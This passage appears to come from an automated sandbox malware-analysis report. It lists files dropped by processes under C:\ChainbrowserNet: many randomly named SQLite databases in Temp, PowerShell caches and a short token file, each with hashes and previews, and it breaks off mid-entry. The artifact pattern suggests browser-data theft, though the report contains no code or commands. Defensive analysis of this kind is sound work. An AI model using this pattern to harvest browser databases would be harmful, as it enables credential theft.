                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1915
                                                                                          Entropy (8bit):5.363869398054153
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                          MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                          SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                          SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                          SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):19253
                                                                                          Entropy (8bit):5.005753878328145
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                          MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                          SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                          SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                          SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                          Malicious:false
                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllultnxj:NllU
                                                                                          MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                          SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                          SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                          SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                          Malicious:false
                                                                                          Preview:@...e................................................@..........

                                                                                          C:\Users\user\AppData\Local\Temp\01sQ7MvZuT

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\0HGZ8n8wDZ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\0ISO8eo5gH

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\0mb7ETS56f

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\19E2tQV8vx

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\1IVwO3jhKg

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\1Tv1SzHUyV

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\1X4lmeqWpo

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\1bpHqqZKCW

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\2XP7gjJt8j

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\2jf1fQZL5r

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\2kenUs8Egq

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\2otX8KRRih

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\3CFxduQukp

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\3MImbkovXn

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\3UTP8cS8LM

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\3bhnfZmZi6

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\5r0bQyFZF1

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25
                                                                                          Entropy (8bit):4.133660689688185
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:QoA/2dlx:Qz/6f
                                                                                          MD5:9EFF8350D868F9C0120ACC8912772A85
                                                                                          SHA1:FBAB2AEB0EEF87AC20FA2980061A5D9D808DCE0E
                                                                                          SHA-256:373CF8E3F4AD5CCA89BA0340220F9F84344D74DEE24507B1708F63A0532E0132
                                                                                          SHA-512:2C1009C07D4208270C0E2B2B5C3574B403DEB1093FA1024247A31B8DEF496CA43C319B9DFAB0B7384D3D78675BA350F9D89D47693166E42EF5E3C6445FF0EDB6
                                                                                          Malicious:false
                                                                                          Preview:rNA0KBNqZ3e3xILAkorqQFNMY

                                                                                          C:\Users\user\AppData\Local\Temp\62pSwquF9J

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\68lO8JPQ0s

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
